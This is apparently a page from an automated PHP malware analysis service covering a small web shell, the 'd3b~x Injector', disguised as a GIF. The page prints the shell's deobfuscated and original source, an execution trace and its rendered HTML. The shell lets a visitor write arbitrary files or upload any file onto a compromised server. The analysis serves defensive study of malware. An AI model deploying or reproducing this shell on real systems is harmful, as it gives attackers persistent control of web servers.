uploader.q.w.php.1.fla

md5: 40f4d9f86272cde6ece7ce290bba1764

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
error_reporting (Deobfuscated, Original, Traces)
php_uname (Deobfuscated, Original, Traces)

Files
copy (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Title
---===[d3b~X]===--- (Deobfuscated, HTML, Original)

URLs
http://st3cycling.com/.txt (Deobfuscated, Original)

Deobfuscated PHP code
GIF89a?????????????????????!??????????????,?????????????????????D???;????
<?php 
print "<pre />\r\n############################################\r\n##         d3b~x Injector         ##\r\n############################################\r\n";
//http://st3cycling.com/.txt
error_reporting(0);
$content = stripslashes($_POST['content']);
$cfile = $_POST['cfile'];
$ufile = $_POST['ufile'];
echo "<BLINK><title>---===[d3b~X]===---</title></BLINK>";
echo '<b><br>' . php_uname() . '<br></b>';
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"aw\" id=\"aw\">";
echo '<textarea name=content style="width:625px;height:300px;background:#000; font-size: 15px bolder; 
color: #00ff00; font-family: "Courier New" >' . $content . '</textarea><br>';
echo "<input type=\"text\" name=\"cfile\" size=\"10\" value=\"newfile.php\" style=\"background:#000; font-size: 15px; \r\ncolor: #00ff00; font-family: \"Courier New\";\">";
echo "<input name=\"_create\" type=\"submit\" id=\"_upl\" value=\"Create\" style=\"background:#000; font-size: 15px; \r\ncolor: #00ff00; font-family: \"Courier New\";\" >";
echo "<input type=\"file\" name=\"file\" size=\"30\"><input type=\"text\" style=\"background:#000; font-size: 15px; \r\ncolor: #00ff00; font-family: \"Courier New\";\" name=\"ufile\" size=\"10\" value=\"newfile.php\">";
echo "<input name=\"_upload\" type=\"submit\" id=\"_upl\" value=\"Upload\" style=\"background:#000; font-size: 15px; \r\ncolor: #00ff00; font-family: \"Courier New\";\"></form>";
if ($_POST['_create']) {
    $handle = fopen($cfile, 'w');
    if ($handle) {
        if (fwrite($handle, $content) === FALSE) {
            echo "<b>Membuat {$cfile} GAGAL</b><br>";
        } else {
            echo "<b>Membuat {$cfile} SUKSES !!!</b><br>";
        }
        fclose($handle);
    } else {
        echo "<b>Membuat File GAGAL</b><br><br>";
    }
}
if ($_POST['_upload']) {
    if (@copy($_FILES['file']['tmp_name'], $ufile)) {
        echo "<b>Upload {$ufile} SUKSES !!!</b><br><br></font>";
    } else {
        echo "<b>Upload {$ufile} GAGAL !!!</b><br><br>";
    }
}
Execution traces
data/traces/40f4d9f86272cde6ece7ce290bba1764_trace-1676256399.6512.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:47:05.549057]
1	0	1	0.000199	393608
1	3	0	0.000295	401392	{main}	1		/var/www/html/uploads/uploader.q.w.php.1.fla	0	0
2	4	0	0.000314	401392	error_reporting	0		/var/www/html/uploads/uploader.q.w.php.1.fla	11	1	0
2	4	1	0.000330	401432
2	4	R			22527
2	5	0	0.000346	401392	stripslashes	0		/var/www/html/uploads/uploader.q.w.php.1.fla	12	1	NULL
2	5	1	0.000360	401456
2	5	R			''
1		A						/var/www/html/uploads/uploader.q.w.php.1.fla	12	$content = ''
1		A						/var/www/html/uploads/uploader.q.w.php.1.fla	12	$cfile = NULL
1		A						/var/www/html/uploads/uploader.q.w.php.1.fla	12	$ufile = NULL
2	6	0	0.000409	401424	php_uname	0		/var/www/html/uploads/uploader.q.w.php.1.fla	14	0
2	6	1	0.000424	401536
2	6	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1	3	1	0.000447	401424
			0.000476	314424
TRACE END   [2023-02-13 00:47:05.549374]

Generated HTML code
<html><head></head><body>GIF89a?????????????????????!??????????????,?????????????????????D???;????
<pre>############################################
##         d3b~x Injector         ##
############################################
<blink><title>---===[d3b~X]===---</title></blink><b><br>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br></b><form action="" method="post" enctype="multipart/form-data" name="aw" id="aw"><textarea name="content" style="width:625px;height:300px;background:#000; font-size: 15px bolder; 
color: #00ff00; font-family: " courier="" new"=""></textarea><br><input type="text" name="cfile" size="10" value="newfile.php" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: " courier="" new";"=""><input name="_create" type="submit" id="_upl" value="Create" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: " courier="" new";"=""><input type="file" name="file" size="30"><input type="text" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: " courier="" new";"="" name="ufile" size="10" value="newfile.php"><input name="_upload" type="submit" id="_upl" value="Upload" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: " courier="" new";"=""></form></pre></body></html>
Original PHP code
GIF89a?????????????????????!??????????????,?????????????????????D???;????
<?php
print('<pre />
############################################
##         d3b~x Injector         ##
############################################
');
//http://st3cycling.com/.txt


error_reporting(0);
$content = stripslashes($_POST['content']); $cfile = $_POST['cfile']; $ufile = $_POST['ufile'];
echo '<BLINK><title>---===[d3b~X]===---</title></BLINK>'; 
echo '<b><br>'.php_uname().'<br></b>'; 
echo '<form action="" method="post" enctype="multipart/form-data" name="aw" id="aw">'; 
echo '<textarea name=content style="width:625px;height:300px;background:#000; font-size: 15px bolder; 
color: #00ff00; font-family: "Courier New" >'.$content.'</textarea><br>'; 
echo '<input type="text" name="cfile" size="10" value="newfile.php" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: "Courier New";">'; 
echo '<input name="_create" type="submit" id="_upl" value="Create" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: "Courier New";" >'; 
echo '<input type="file" name="file" size="30"><input type="text" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: "Courier New";" name="ufile" size="10" value="newfile.php">'; 
echo '<input name="_upload" type="submit" id="_upl" value="Upload" style="background:#000; font-size: 15px; 
color: #00ff00; font-family: "Courier New";"></form>'; 
 if($_POST['_create']){ 
  $handle = fopen($cfile, 'w'); 
  if($handle){ 
      if (fwrite($handle, $content) === FALSE) { echo "<b>Membuat $cfile GAGAL</b><br>"; } 
      else { echo "<b>Membuat $cfile SUKSES !!!</b><br>"; } fclose($handle); 
  } else { echo '<b>Membuat File GAGAL</b><br><br>'; } 
  } 
  if($_POST['_upload']){ 
  if(@copy($_FILES['file']['tmp_name'], $ufile)) { echo "<b>Upload $ufile SUKSES !!!</b><br><br></font>"; } 
  else { echo "<b>Upload $ufile GAGAL !!!</b><br><br>"; } 
  } 
 ?>
PHP Malware Analysis

uploader.q.w.php.1.fla

md5: 40f4d9f86272cde6ece7ce290bba1764

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
